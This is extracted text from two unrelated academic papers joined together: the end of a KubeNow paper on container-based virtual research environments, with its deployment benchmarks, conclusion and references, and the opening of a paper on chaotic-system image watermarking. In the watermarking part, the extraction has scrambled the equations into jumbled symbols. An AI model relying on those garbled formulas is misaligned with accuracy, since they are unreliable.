10.7717/peerj-cs.232 17/26 https://peerj.com https://doi.org/10.7717/peerjcs.232/fig-5 https://doi.org/10.7717/peerjcs.232/fig-6 http://dx.doi.org/10.7717/peerj-cs.232 small constant up to 32 nodes. However, when we increased the number of nodes to 64, the deployment time on Azure almost doubled. Finally, on AWS deployment time was better than on the other providers for small clusters (8 and 16 nodes). However, when provisioning 32 and 64 nodes, AWS time increased by a larger factor, and it almost doubled when we scaled from 16 to 32 nodes. When provisioning on different cloud providers, KubeNow uses the same deployment strategy, which consists in creating the infrastructure with Terraform, and in waiting for the decentralized dynamic configuration to be completed on each node. The same Ansible contextualization is then applied to make small adjustments in the deployment, on every cloud provider. Since the deployment strategy is not cloud-specific, differences in deployment time among clouds are due to the infrastructure layer, which is managed independently by the providers. Finally, it is important to point out that cloud providers can make changes in the infrastructure layer, impacting the results that we show in this study. DISCUSSION The presented methodology differs from the state of the art, as it makes use of the microservice-oriented architecture to deliver on-demand VREs to scientists. This improves isolation of VREs components, and enables to assemble workflows of highly- compartmentalized software components through the adoption of application containers. Achieving scalability by using VMs as isolation mechanism would otherwise be unfeasible, due to the overhead introduced by the guest operating systems. The implementation for our methodology, namely KubeNow, has been adopted by PhenoMeNal: a live European collaboration in medical metabolomics. Various partners in PhenoMeNal successfully deployed and leveraged KubeNow-based VREs on the major public cloud providers as well as on national-scale OpenStack installations, including those provided by EMBL-EBI (EMBL-EBI Cloud, 2019), de.NBI (de.NBI cloud, 2019), SNIC (Toor et al., 2017), CSC (CSC cloud, 2019) and CityCloud (CityCloud, 2019). By referring to use cases in PhenoMeNal, we have shown the ability of our methodology to scale scientific data processing, both in terms of individual tool parallelization (‘Parallelization of individual tools’) and complete analysis scaling (‘Full analysis scaling’). It is important to point out that since the analyses are fully defined via workflow languages, the pipelines are intrinsically well documented and, by using KubeNow and PhenoMeNal-provided container images, any scientist can reproduce the results on any of the supported cloud providers. When comparing KubeNow with other available platforms provided by the IT industry, such as Kubespray, it is important to point out that our methodology is conceived for analytics, rather than for highly-available service hosting. This design choice reflects a use case that we envision to become predominant in science. In fact, while the IT industry is embracing application containers to build resilient services at scale, scientists are making use of the technology to run reproducible and standardized analytics. When it comes to long-running service hosting, long deployment time and complex installation procedures Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 18/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 are a reasonable price to pay, as they occur only initially. In contrast, we focus on a use case where researchers need to allocate cloud resources as needed. Under these assumptions there is a need for adopting simple, fast and scalable deployment procedures. KubeNow meets these requirements by providing: (1) an uncomplicated user interaction (see ‘Enabling scalable deployments’) and (2) fast and scalable deployments (see ‘Deployment automation scalability’). Microservices and application containers are increasingly gaining momentum in scientific applications (Peters et al., 2018; D’Agostino et al., 2017; Wu et al., 2017; Williams et al., 2016). When it comes to on-demand VREs the technology presents some important advantages over current systems. Our methodology is based on publicly available information by three research initiatives in substantially different scientific domains (PhenoMeNal, EXTraS and SKA). It is important to point out that EXTraS and SKA provide microservices-oriented VREs primarly as long running platforms, and they do not cover on-demand instantiation, while our methodology made this possible in PhenoMeNal. The requirements in terms of VRE infrastructure are similar across domains, which allowed us to design our methodology as generally applicable. Hence, we envision our work and the presented benchmarks as valuable guidelines for communities of practice that need to build on-demand VRE systems. CONCLUSION Here, we introduced a microservice-oriented methodology where scientific applications run in a distributed orchestration platform as light-weight software containers, referred to as on-demand VREs. Our methodology makes use of application containers to improve isolation of VRE components, and it uses cloud computing to dynamically procure infrastructure. The methodology builds on publicly available information by three research initiatives, and it is generally applicable over multiple research domains. The applicability of the methodology was tested through an open source implementation, showing good scaling for data analysis in metabolomics and in terms of deployment speed. We envision communities of practice to use our work as a guideline and blueprint to build on-demand VREs. ETHICAL APPROVAL AND INFORMED CONSENT Human-derived samples in the datasets are consented for analysis, publication and distribution, and they were processed according to the ELSI guidelines (Sariyar et al., 2015). Ethics and consents are extensively explained in the referenced publications (Gao et al., 2019; Herman et al., 2018; Ranninger et al., 2016). ACKNOWLEDGEMENTS We kindly acknowledge contributions to cloud resources by SNIC, EMBL-EBI, CityCloud, CSC, AWS and Azure. Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 19/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.232 ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was supported by The European Commission’s Horizon 2020 programme under grant agreement number 654241 (PhenoMeNal) and the Nordic e-Infrastructure Collaboration (NeIC) via the Glenna2 and Tryggve2 projects. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: The European Commission’s Horizon 2020 programme: 654241. Nordic e-Infrastructure Collaboration (NeIC). Competing Interests The authors declare there are no competing interests. Author Contributions • Marco Capuccini conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Anders Larsson conceived and designed the experiments, contributed reagents/materi- als/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • Matteo Carone performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft. • Jon Ander Novella, Noureddin Sadawi and Jianliang Gao performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, approved the final draft. • Salman Toor and Ola Spjuth conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The data in the study by Gao et al. is publicly available: Available at https://doi.org/10. 6084/m9.figshare.c.4204022. Detailed instructions for reporoducing the analysis can be found at https://github.com/csmsoftware/phnmnl-scalability. Novella et al. and Khoonsari et al. used public data from the Methabolights repository, and in particular datasets: MTBLS558 and MTBLS233. Detailed instructions for reporoducing the analyses can be found at https://github.com/pharmbio/LC-MS- Pachyderm and at https://github.com/phnmnl/MTBLS233-Jupyter, respectively. Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 20/26 https://peerj.com https://doi.org/10.6084/m9.figshare.c.4204022 https://doi.org/10.6084/m9.figshare.c.4204022 https://github.com/csmsoftware/phnmnl-scalability https://github.com/pharmbio/LC-MS-Pachyderm https://github.com/pharmbio/LC-MS-Pachyderm https://github.com/phnmnl/MTBLS233-Jupyter http://dx.doi.org/10.7717/peerj-cs.232 KubeNow is publicly available as open-source software: https://github.com/kubenow/ KubeNow Detailed instruction for deploying KubeNow and reproducing the experiments in ‘Deployment automation scalability’ can be found at https://kubenow.readthedocs.io. PhenoMeNal is publicly available as open-source software: https://github.com/phnmnl/ phenomenal-h2020/wiki. REFERENCES Amazon Elastic Container Service. 2019. Available at https://docs.aws.amazon.com/ AmazonECS/latest/developerguide/ECS_instances.html (accessed on 16 May 2019). Amazon Elastic File System. 2019. Available at https://aws.amazon.com/efs (accessed on 16 May 2019). Ansible. 2019. Available at https://www.ansible.com (accessed on 16 May 2019). Armbrust M, Fox A, Griffith R, Joseph AD, Katz RH, Konwinski A, Lee G, Patterson DA, Rabkin A, Stoica I, Zaharia M. 2009. Above the clouds: a berkeley view of cloud computing. Technical report UCB/EECS-2009-28. EECS Department, University of California, Berkeley. Asay M. 2016. Why Kubernetes is winning the container war. Available at http://www. infoworld.com/article/3118345/cloud-computing/why-kubernetes-is-winning-the- container-war.html (accessed on 16 May 2019). Assante M, Candela L, Castelli D, Cirillo R, Coro G, Frosini L, Lelii L, Mangiacrapa F, Marioli V, Pagano P, Panichi G, Perciante C, Sinibaldi F. 2019. The gCube system: delivering virtual research environments as-a-service. Future Generation Computer Systems 95:445–453 DOI 10.1016/j.future.2018.10.035. Azure Container Instances. 2019. Available at https://azure.microsoft.com/en-us/services/ container-instances (accessed on 16 May 2019). Azure NetApp Files. 2019. Available at https://azure.microsoft.com/en-us/services/ storage/netapp (accessed on 16 May 2019). Baldini I, Castro P, Chang K, Cheng P, Fink S, Ishakian V, Mitchell N, Muthusamy V, Rabbah R, Slominski A, Suter P. 2017. Serverless computing: current trends and open problems. In: Research advances in cloud computing. Springer, 1–20 DOI 10.1007/978-981-10-5026-8_1. Bayramusta M, Nasir VA. 2016. A fad or future of IT?: a comprehensive literature review on the cloud computing research. International Journal of Information Management 36(4):635–644 DOI 10.1016/j.ijinfomgt.2016.04.006. Bild DE, Bluemke DA, Burke GL, Detrano R, Diez Roux AV, Folsom AR, Greenland P, Jacobs Jr DR, Kronmal R, Liu K, Nelson JC, O’Leary D, Saad MF, Shea S, Szklo M, Tracy RP. 2002. Multi-ethnic study of atherosclerosis: objectives and design. American Journal of Epidemiology 156(9):871–881 DOI 10.1093/aje/kwf113. Candela L, Castelli D, Pagano P. 2013. Virtual research environments: an overview and a research agenda. Data Science Journal 12:GRDI75–GRDI81. CityCloud. 2019. Available at http://citycloud.com (accessed on 16 May 2019). Cloud-init. 2019. Available at https://cloud-init.io (accessed on 16 May 2019). Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 21/26 https://peerj.com https://github.com/kubenow/KubeNow https://github.com/kubenow/KubeNow https://kubenow.readthedocs.io https://github.com/phnmnl/phenomenal-h2020/wiki https://github.com/phnmnl/phenomenal-h2020/wiki https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_instances.html https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_instances.html https://aws.amazon.com/efs https://www.ansible.com http://www.infoworld.com/article/3118345/cloud-computing/why-kubernetes-is-winning-the-container-war.html http://www.infoworld.com/article/3118345/cloud-computing/why-kubernetes-is-winning-the-container-war.html http://www.infoworld.com/article/3118345/cloud-computing/why-kubernetes-is-winning-the-container-war.html http://dx.doi.org/10.1016/j.future.2018.10.035 https://azure.microsoft.com/en-us/services/container-instances https://azure.microsoft.com/en-us/services/container-instances https://azure.microsoft.com/en-us/services/storage/netapp https://azure.microsoft.com/en-us/services/storage/netapp http://dx.doi.org/10.1007/978-981-10-5026-8_1 http://dx.doi.org/10.1016/j.ijinfomgt.2016.04.006 http://dx.doi.org/10.1093/aje/kwf113 http://citycloud.com https://cloud-init.io http://dx.doi.org/10.7717/peerj-cs.232 Cloudflare. 2019. Available at https://www.cloudflare.com (accessed on 16 May 2019). Cloudfuse. 2019. Available at https://github.com/redbo/cloudfuse (accessed on 16 May 2019). CSC cloud. 2019. Available at https://research.csc.fi/cloud-computing (accessed on 16 May 2019). Cyvoct P. 2018. How to deploy an EFK stack to Kubernetes. Available at https://blog.ptrk. io/how-to-deploy-an-efk-stack-to-kubernetes (accessed on 23 August 2018). D’Agostino D, Roverelli L, Zereik G, Luca AD, Salvaterra R, Belfiore A, Lisini G, Novara G, Tiengo A. 2017. A microservice-based portal for X-ray transient and variable sources. PeerJ PrePrints 5:e2519. Dahlö M, Scofield DG, Schaal W, Spjuth O. 2018. Tracking the NGS revolution: managing life science research on shared high-performance computing clusters. GigaScience 7(5):Article giy028. de.NBI cloud. 2019. Available at https://www.denbi.de/cloud (accessed on 16 May 2019). Duhrkop K, Shen H, Meusel M, Rousu J, Bocker S. 2015. Searching molecular struc- ture databases with tandem mass spectra using CSI:FingerID. Proceedings of the National Academy of Sciences of the United States of America 112:12580–12585 DOI 10.1073/pnas.1509788112. Elia IA, Antunes N, Laranjeiro N, Vieira M. 2017. An analysis of OpenStack vulnerabili- ties. In: 2017 13th European Dependable Computing Conference (EDCC). 129–134. Emami Khoonsari P, Moreno P, Bergmann S, Burman J, Capuccini M, Carone M, Cascante M, De Atauri P, Foguet C, Gonzalez-Beltran AN, Hankemeier T, Haug K, He S, Herman S, Johnson D, Kale N, Larsson A, Neumann S, Peters K, Pireddu L, Rocca-Serra P, Roger P, Rueedi R, Ruttkies C, Sadawi N, Salek RM, Sansone S-A, Schober D, Selivanov V, Thévenot EA, Van Vliet M, Zanetti G, Steinbeck C, Kultima K, Spjuth O. 2018. Interoperable and scalable data analysis with microservices: applications in metabolomics. Bioinformatics 35(19):3752–3760 DOI 10.1093/bioinformatics/btz160. EMBL-EBI Cloud. 2019. Available at http://www.embassycloud.org (accessed on 16 May 2019). FeatureFinderMetabo. 2018. Available at https://abibuilder.informatik.uni-tuebingen.de/ archive/openms/Documentation/RC/2.3.0/html/TOPP_FeatureFinderMetabo.html (accessed on 06 April 2018). Gao J, Sadawi N, Karaman I, Pearce J, Mereno P, Larsson A, Capuccini M, Elliott P, Nicholson JK, Ebbels T, Glen RC. 2019. Metabolomics in the cloud: scaling computational tools to big data. ArXiv preprint. arXiv:1904.02288. GlusterFS. 2019. Available at https://www.gluster.org (accessed on 16 May 2019). Goecks J, Nekrutenko A, Taylor J, Galaxy Team. 2010. Galaxy: a comprehen- sive approach for supporting accessible, reproducible, and transparent com- putational research in the life sciences. Genome Biology 11(8):Article R86 DOI 10.1186/gb-2010-11-8-r86. Google Cloud Filestore. 2019. Available at https://cloud.google.com/filestore (accessed on 16 May 2019). Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 22/26 https://peerj.com https://www.cloudflare.com https://github.com/redbo/cloudfuse https://research.csc.fi/cloud-computing https://blog.ptrk.io/how-to-deploy-an-efk-stack-to-kubernetes https://blog.ptrk.io/how-to-deploy-an-efk-stack-to-kubernetes https://www.denbi.de/cloud http://dx.doi.org/10.1073/pnas.1509788112 http://dx.doi.org/10.1093/bioinformatics/btz160 http://www.embassycloud.org https://abibuilder.informatik.uni-tuebingen.de/archive/openms/Documentation/RC/2.3.0/html/TOPP_FeatureFinderMetabo.html https://abibuilder.informatik.uni-tuebingen.de/archive/openms/Documentation/RC/2.3.0/html/TOPP_FeatureFinderMetabo.html http://arXiv.org/abs/1904.02288 https://www.gluster.org http://dx.doi.org/10.1186/gb-2010-11-8-r86 https://cloud.google.com/filestore http://dx.doi.org/10.7717/peerj-cs.232 Google Cloud Run. 2019. Available at https://cloud.google.com/run (accessed on 16 May 2019). Hao J, Astle W, De Iorio M, Ebbels TMD. 2012. BATMAN—an R package for the automated quantification of metabolites from nuclear magnetic reso- nance spectra using a Bayesian model. Bioinformatics 28(15):2088–2090 DOI 10.1093/bioinformatics/bts308. Haug K, Salek R, Conesa Mingo P, Hastings J, Matos P, Rijnbeek M, Mahendraker T, Williams M, Neumann S, Rocca-Serra P, Maguire E, Gonzlez-Beltrán A, Sansone S-A, Griffin J, Steinbeck C. 2012. MetaboLights—an open-access general-purpose repository for metabolomics studies and associated meta-data. Nucleic Acids Research 41(D1):D781–D786. Helm. 2019. Available at https://github.com/kubernetes/helm (accessed on 16 May 2019). Herman S, Khoonsari P, Tolf A, Steinmetz J, Zetterberg H, Akerfeldt T, Jakobsson P-J, Larsson A, Spjuth O, Burman J, Kultima K. 2018. Integration of magnetic resonance imaging and protein and metabolite CSF measurements to enable early diagnosis of secondary progressive multiple sclerosis. Theranostics 8(16):4477–4490 DOI 10.7150/thno.26249. Hindman B, Konwinski A, Zaharia M, Ghodsi A, Joseph AD, Katz RH, Shenker S, Stoica I. 2011. Mesos: a platform for fine-grained resource sharing in the data center. In: NSDI, vol. 11. NSDI’11 Proceedings of the 8th USENIX conference on Networked systems design and implementation, 22–22. Available at https://www. usenix.org/legacy/events/nsdi11/tech/full_papers/Hindman.pdf . Javed A, Heljanko K, Buda A, Främling K. 2018. CEFIoT: a fault-tolerant IoT architec- ture for edge and cloud. In: 2018 IEEE 4th world forum on internet of things (WF- IoT). IEEE, 813–818. Jupyter. 2019. Available at https://jupyter.org (accessed on 16 May 2019). Karakoyunlu C, Kimpe D, Carns P, Harms K, Ross R, Ward L. 2013. Toward a unified object storage foundation for scalable storage systems. In: Cluster computing (CLUSTER), 2013 IEEE international conference on. IEEE, 1–8. Karaman I, Ferreira DLS, Boulangé CL, Kaluarachchi MR, Herrington D, Dona AC, Castagné R, Moayyeri A, Lehne B, Loh M, De Vries PS, Dehghan A, Franco OH, Hofman A, Evangelou E, Tzoulaki I, Elliott P, Lindon JC, Ebbels TMD. 2016. Workflow for integrated processing of multicohort untargeted 1H NMR metabolomics data in large-scale metabolic epidemiology. Journal of Proteome Research 15(12):4188–4194 DOI 10.1021/acs.jproteome.6b00125. Khan A. 2017. Key characteristics of a container orchestration platform to enable a mod- ern application. IEEE Cloud Computing 4(5):42–48 DOI 10.1109/MCC.2017.4250933. KubeNow GitHub organization. 2019. Available at https://github.com/kubenow (accessed on 16 May 2019). Kubespray. 2019. Available at https://github.com/kubernetes-incubator/kubespray (accessed on 16 May 2019). Kurtzer GM, Sochat V, Bauer MW. 2017. Singularity: scientific containers for mobility of compute. PLOS ONE 12(5):e0177459 DOI 10.1371/journal.pone.0177459. Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 23/26 https://peerj.com https://cloud.google.com/run http://dx.doi.org/10.1093/bioinformatics/bts308 https://github.com/kubernetes/helm http://dx.doi.org/10.7150/thno.26249 https://www.usenix.org/legacy/events/nsdi11/tech/full_papers/Hindman.pdf https://www.usenix.org/legacy/events/nsdi11/tech/full_papers/Hindman.pdf https://jupyter.org http://dx.doi.org/10.1021/acs.jproteome.6b00125 http://dx.doi.org/10.1109/MCC.2017.4250933 https://github.com/kubenow https://github.com/kubernetes-incubator/kubespray http://dx.doi.org/10.1371/journal.pone.0177459 http://dx.doi.org/10.7717/peerj-cs.232 Lampa S, Dahlö M, Olason PI, Hagberg J, Spjuth O. 2013. Lessons learned from implementing a national infrastructure in Sweden for storage and analysis of next-generation sequencing data. Gigascience 2(1):Article 2047-217X-2-9 DOI 10.1186/2047-217X-2-9. Laure E, Edlund Å. 2012. The e-infrastructure ecosystem: providing local support to global science. Large-Scale Computing Techniques for Complex System Simulations 80:19–34. Luigi. 2018. Available at https://github.com/spotify/luigi (accessed on 07 January 2018). Manousis A, Ragsdale R, Draffin B, Agrawal A, Sekar V. 2016. Shedding light on the adoption of Let’s Encrypt. ArXiv preprint. arXiv:1611.00469. Manu AR, Patel JK, Akhtar S, Agrawal VK, Murthy KNBS. 2016. A study, analysis and deep dive on cloud PaaS security in terms of Docker container security. In: 2016 international conference on circuit, power and computing technologies (ICCPCT). 1–13. Marathon. 2018. Available at https://mesosphere.github.io/marathon (accessed on 06 April 2018). Naik N. 2016. Building a virtual system of systems using Docker Swarm in multiple clouds. In: Systems Engineering (ISSE), 2016 IEEE International Symposium on. Piscataway: IEEE, 1–3. Neal F. 2018. The state of microservices maturity. O’Reilly Media, Inc. Netto HV, Lung LC, Correia M, Luiz AF, De Souza LMS. 2017. State machine replication in containers managed by Kubernetes. Journal of Systems Architecture 73:53–59 DOI 10.1016/j.sysarc.2016.12.007. NIP.IO. 2019. Available at http://nip.io (accessed on 16 May 2019). Novella JA, Emami Khoonsari P, Herman S, Whitenack D, Capuccini M, Burman J, Kultima K, Spjuth O. 2018. Container-based bioinformatics with Pachyderm. Bioinformatics 35(5):839–846. Open Container Initiative. 2016. The 5 principles of standard containers. Available at https://github.com/opencontainers/runtime-spec/blob/master/principles.md (accessed on 16 May 2019). OpenStack Manila. 2019. Available at https://wiki.openstack.org/wiki/Manila (accessed on 16 May 2019). OpenStack Zun. 2019. Available at https://docs.openstack.org/zun (accessed on 16 May 2019). Pachyderm. 2019. Available at https://pachyderm.io (accessed on 16 May 2019). Packer. 2019. Available at https://www.packer.io (accessed on 16 May 2019). Pathan A-MK, Buyya R. 2007. A taxonomy and survey of content delivery networks. Technical Report, 4. Grid Computing and Distributed Systems Laboratory, Univer- sity of Melbourne. Peters K, Bradbury J, Bergmann S, Capuccini M, Cascante M, De Atauri P, Ebbels TMD, Foguet C, Glen R, Gonzalez-Beltran A, Günther UL, Handakas E, Hanke- meier T, Haug K, Herman S, Holub P, Izzo M, Jacob D, Johnson D, Jourdan F, Kale N, Karaman I, Khalili B, EmamiKhonsari P, Kultima K, Lampa S, Larsson A, Ludwig C, Moreno P, Neumann S, Novella JA, O’Donovan C, Pearce JTM, Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 24/26 https://peerj.com http://dx.doi.org/10.1186/2047-217X-2-9 https://github.com/spotify/luigi http://arXiv.org/abs/1611.00469 https://mesosphere.github.io/marathon http://dx.doi.org/10.1016/j.sysarc.2016.12.007 http://nip.io https://github.com/opencontainers/runtime-spec/blob/master/principles.md https://wiki.openstack.org/wiki/Manila https://docs.openstack.org/zun https://pachyderm.io https://www.packer.io http://dx.doi.org/10.7717/peerj-cs.232 Peluso A, Piras ME, Pireddu L, Reed MAC, Rocca-Serra P, Roger P, Rosato A, Rueedi R, Ruttkies C, Sadawi N, Salek RM, Sansone S-A, Selivanov V, Spjuth O, Schober D, Thévenot EA, Tomasoni M, VanRijswijk M, VanVliet M, Viant MR, Weber RJM, Zanetti G, Steinbeck C. 2018. PhenoMeNal: processing and analysis of metabolomics data in the cloud. GigaScience 8(2):Article giy149. Ranninger C, Schmidt LE, Rurik M, Limonciel A, Jennings P, Kohlbacher O, Huber CG. 2016. Improving global feature detectabilities through scan range splitting for untargeted metabolomics by high-performance liquid chromatography-Orbitrap mass spectrometry. Analytica Chimica Acta 930:13–22 DOI 10.1016/j.aca.2016.05.017. Roth B, Hecht R, Volz B, Jablonski S. 2011. Towards a generic cloud-based virtual research environment. In: Computer software and applications conference workshops (COMPSACW), 2011 IEEE 35th annual. Piscataway: IEEE, 267–272. Sariyar M, Schluender I, Smee C, Suhr S. 2015. Sharing and reuse of sensitive data and samples: supporting researchers in identifying ethical and legal requirements. Biopreservation and Biobanking 13(4):263–270 DOI 10.1089/bio.2015.0014. Shimel A. 2016. Docker becomes de facto Linux standard. Available at http://www. networkworld.com/article/2226751/opensource-subnet/docker-becomes-de-facto- linux-standard.html (accessed on 16 May 2019). Terraform. 2019. Available at https://terraform.io (accessed on 16 May 2019). Traefik. 2019. Available at https://traefik.io (accessed on 16 May 2019). Travis CI. 2019. Available at https://travis-ci.org (accessed on 16 May 2019). Thönes J. 2015. Microservices. IEEE Software 32(1):116–116. Toor S, Lindberg M, Falman I, Vallin A, Mohill O, Freyhult P, Nilsson L, Agback M, Viklund L, Zazzik H, Spjuth O, Capuccini M, Möller J, Murtagh D, Hellander A. 2017. SNIC science cloud (SSC): a national-scale cloud infrastructure for Swedish Academia. In: 2017 IEEE 13th international conference on e-science (e-Science). Piscataway: IEEE, 219–227. Vaughan-Nichols SJ. 2016. Containers vs. virtual machines: how to tell which is the right choice for your enterprise. Available at https://www.networkworld.com/article/ 3068392/cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the- right-choice-for-your-enterprise.html (accessed on 29 June 2018). Vayghan LA, Saied MA, Toeroe M, Khendek F. 2018. Deploying microservice based applications with Kubernetes: experiments and lessons learned. In: 2018 IEEE 11th international conference on cloud computing (CLOUD). IEEE, 970–973. Vixie P, Thomson S, Rekhter Y, Bound J. 1997. Dynamic updates in the domain name system (DNS UPDATE). Technical report, RFC 2136. Weerasiri D, Barukh MC, Benatallah B, Sheng QZ, Ranjan R. 2017. A taxonomy and survey of cloud resource orchestration techniques. ACM Computing Surveys (CSUR) 50(2):Article 26. Williams CL, Sica JC, Killen RT, Balis UG. 2016. The growing need for microservices in bioinformatics. Journal of Pathology Informatics 7:Article 45 DOI 10.4103/2153-3539.194835. Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 25/26 https://peerj.com http://dx.doi.org/10.1016/j.aca.2016.05.017 http://dx.doi.org/10.1089/bio.2015.0014 http://www.networkworld.com/article/2226751/opensource-subnet/docker-becomes-de-facto-linux-standard.html http://www.networkworld.com/article/2226751/opensource-subnet/docker-becomes-de-facto-linux-standard.html http://www.networkworld.com/article/2226751/opensource-subnet/docker-becomes-de-facto-linux-standard.html https://terraform.io https://traefik.io https://travis-ci.org https://www.networkworld.com/article/3068392/cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html https://www.networkworld.com/article/3068392/cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html https://www.networkworld.com/article/3068392/cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html http://dx.doi.org/10.4103/2153-3539.194835 http://dx.doi.org/10.7717/peerj-cs.232 Wu C, Tobar R, Vinsen K, Wicenec A, Pallot D, Lao B, Wang R, An T, Boulton M, Cooper I, Dodson R, Dolensky M, Mei Y, Wang F. 2017. DALiuGE: a graph execution framework for harnessing the astronomical data deluge. Astronomy and Computing 20:1–15 DOI 10.1016/j.ascom.2017.03.007. Zhao D, Mohamed M, Ludwig H. 2018. Locality-aware scheduling for containers in cloud computing. IEEE Transactions on Cloud Computing Epub ahead of print Jan 16 2018 DOI 10.1109/TCC.2018.2794344. Capuccini et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.232 26/26 https://peerj.com http://dx.doi.org/10.1016/j.ascom.2017.03.007 http://dx.doi.org/10.1109/TCC.2018.2794344 http://dx.doi.org/10.7717/peerj-cs.232 work_5ugdn7t5sbcplkszshjcthwizq ---- 79 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Image Watermarking Encryption Scheme Based on Fractional Order Chaotic System Dawei Ding 1, Zongzhi Li 2 and Shujia Li 3 School of Electronic Information Engineering, Anhui University, Hefei 230601, China. Email: 1 dwding@ahu.edu.cn, 2 493756119@qq.com, 3 1352288370@qq.com Abstract. Now the chaotic system and wavelet transform are more and more widely used in the watermarking technology. At the same time, the fractional order chaotic system has more complex dynamic characteristics than the integer order system. So a new image watermarking scheme based on the fractional order Chen chaotic system and discrete wavelet transform is proposed. Chaotic sequences generated by chaotic system are used to encrypt the watermark image, and the processed watermark information is embedded into the original image by the discrete wavelet transform. Finally, the security analysis of the proposed watermarking algorithm is presented. The experimental results show that the proposed watermarking scheme has high security, and it has stronger robustness and invisibility compared with the previous work. Keywords: fractional order chaotic system, discrete wavelet transform(DWT), image watermarking, security, robustness, invisibility 1. Introductiong With the rapid development of network technology,all kinds of digital media are more convenient to spread through the network,the security of digital media becomes more and more important in the network. Copyright protection is one of the important aspects.Digital watermarking technique is a kind of information hiding technique, it can be used as a kind of more effective copyright protection of digital works and anti fake technology. At present, the chaotic system is more and more widely used in the watermarking technology and has achieved good results, a considerable part of chaos-based image watermarking schemes are proposed[1–6]. Poonkuntran and Rajesh proposed a new imperceptible image watermarking scheme for active authentication for images[1]. The scheme used chaotic system to process the watermark, and used the integer transform to embed the watermark information. Tong Xiaojun et al. proposed an image watermarking technique based on scrambling and self restoration[2]. A coupled chaotic map was used to scramble the original image block by block. Behnia et al. proposed an image watermarking scheme based on double chaotic map[3]. One map was used to encrypt the embedded position, and another one was used to determine the pixels of the host image. Gao Tiegang et al. proposed an image watermark authentication method based on neural network with hyper chaotic characteristics[4]. The method used the authentication password as the key, and the pixel value was used as the input of the neural network. Mooney et al. used the combination of white noise and chaotic sequence to encrypt the watermark[5]. 80 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Gao Guangyong et al. used composite chaos to encrypt the watermarking image, and resisted the geometric attack based on a composite-chaos optimized support vector regression(SVR) model [6]. Watermarking methods can mainly be divided into three types according to the restore information: non-blind, semi-blind and blind watermarking methods[7]. Non-blind methods need all the information of the original image and the key. Semi-blind methods need watermark sequence and the key, and blind methods need key only. Watermarking methods can be divided into two other types according to the embedding strategy: 1) Spatial domain watermarking: the value of the image element is changed directly, and the hidden content is added in the brightness of the image element, however, this method is easy to be obtained, and the robustness of the image processing is poor. 2) Transform domain watermarking: use a mathematical transformation to transform the image into the transform domain, and add the information by changing some transform coefficients of image, and then use the inverse transform to recover the hidden watermark information and image. The advantages of using transform technique include the ability to ensure that the watermark is not visible and resistance to the corresponding lossy compression. Keyvanpour et al. proposed a watermarking method based on chaotic map and operation of transform domain[8]. The coding process was special and the key was generated by chaotic map, the wavelet quantization process was used to transfer the sequence. Zhang Dengyin et al. proposed a watermarking algorithm based on one-dimensional (1-D) chaotic map in wavelet transform (WT) domain[9]. The watermark was encoded by a chaotic sequence and embedded into the low-and intermediate-frequency bands of three-layer WT domain. Barni et al. proposed a watermarking method based on discrete wavelet transform, the embedded operation was done in the high frequency part[10]. In addition, there are many examples of the combination of wavelet transform and other operations[11-13]. Therefore, it is feasible to use discrete wavelet transform(DWT) and chaotic system to encrypt the watermark. At the same time, the research shows that the low dimensional chaotic system has the defects of the limited key space and the worrying security, but the high dimensional chaotic systems have higher complexity, randomness and unpredictability, and it can better resist the attack of phase space reconstruction and other methods[14]. The Chen’s system is a three-dimensional chaotic system with complex topology than Lorenz attractor. The fractional order chaotic dynamics system has more complex and richer dynamic characteristics than the integer order system, and it has the advantage of increasing the randomness and unpredictability, Moreover, the fractional order system can also provide more key parameters and increase the key space for the encryption system, so it will improve the encryption effect of the system. Inspired by above analysis, a new image watermarking scheme based on the fractional order Chen chaotic system and discrete wavelet transform is proposed. Firstly chaotic sequences generated by chaotic system are used to encrypt the watermark image. Then the processed watermark information is embedded into the original image by the discrete wavelet transform. The main content of the study is as follows. In Section 2, the related theoretical works are introduced in detail. In Section 3, the process of the proposed watermarking algorithm is described in detail. Experimental results and security analysis are given in Section 4. The final conclusion is shown in Section 5. Image Watermarking Encryption Scheme Based on Fractional Order Chaotic System 81 2. Related Works 2.1 The fractional-order Chen’s chaotic system Consider the fractional-order Chen’s chaotic system[15] described by ( ) ( ) d x a y x dt d y c a x xz cy dt d z xy bz dt α α β β γ γ  = −   = − − +   = −  (1) where , ,α β γ are fractional derivative orders, 3( , , )x y z ∈ are state variables, 0, 0, 0a b c> > > are parameters of the system. The Grunwald-Letnikov of fractional calculus[16] is defined as: ( ) ( ) [( )/ ] 0 0 11 ( ) lim ( 1) ( ); 0 ! 1 t a h j a t h j D f x f x jh h j j υ υ υ υ υ − → = + = − − > − + ∑ (2) where and are lower bound and upper limit of integral, is fractional derivative order, is 